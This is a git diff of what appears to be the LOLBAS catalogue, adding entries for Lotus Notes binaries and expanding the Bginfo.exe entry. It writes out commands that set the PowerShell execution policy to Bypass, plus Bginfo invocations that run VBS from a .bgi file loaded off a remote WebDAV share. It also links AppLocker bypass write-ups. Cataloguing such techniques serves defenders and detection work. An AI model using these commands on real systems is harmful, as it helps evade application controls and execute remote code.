Merge branch 'master' into master
commit
388b6a64ac
|
@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Gpup.exe](OtherBinaries/Gpup.md)
|
||||
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
|
||||
[Notes.exe](OtherBinaries/Notes.md)
|
||||
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
|
||||
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
|
||||
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)
|
||||
|
|
|
@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN
|
|||
|
||||
Acknowledgements:
|
||||
* Pierre-Alexandre Braeken - @pabraeken
|
||||
* Matt harr0ey - @harr0ey
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/pabraeken/status/994392481927258113
|
||||
* https://twitter.com/harr0ey/status/975350238184697857
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
## Nlnotes.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Daniel Bohannon - @danielhbohannon
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
* https://twitter.com/HanseSecure/status/995578436059127808
|
||||
|
||||
|
||||
Full path:
|
||||
```
|
||||
?
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used by Lotus Notes
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
## Notes.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Daniel Bohannon - @danielhbohannon
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
* https://twitter.com/HanseSecure/status/995578436059127808
|
||||
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used by Lotus Notes
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
@ -3,11 +3,35 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
(Add vbs code inside .bgi file)
|
||||
bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
|
||||
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
|
||||
|
||||
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Oddvar Moe - @oddvarmoe
|
||||
|
||||
|
||||
|
||||
Code sample:
|
||||
* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
|
||||
|
||||
Resources:
|
||||
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
|
||||
* https://twitter.com/Oddvarmoe/status/865330067630694400
|
||||
* https://twitter.com/ItsReallyNick/status/996133093613424641
|
||||
* https://github.com/3gstudent/bgi-creater
|
||||
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
|
||||
|
||||
Full path:
|
||||
```
|
||||
No fixed path
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used to set background image in Windows with details about the environment
|
||||
|
||||
|
||||
Detection:
|
||||
Bginfo.exe requesting files externally or running VBS scripts.
|
||||
|
|
|
@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added
|
|||
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
|
||||
Would really love if the community could contribute as much as possible. That would make it better for everyone.
|
||||
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
|
||||
If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
|
||||
|
||||
|
||||
## STORY
|
||||
|
@ -78,4 +78,4 @@ Love this logo:
|
|||
- [ ] Map it to the Mitre Att&ck <3
|
||||
- [ ] LOLGuiBins
|
||||
- [ ] More list based on classifications
|
||||
- [ ] LOLBAS lists for Linux? OSX?
|
||||
- [ ] LOLBAS lists for Linux? OSX?
|
||||
|
|
Loading…
Reference in New Issue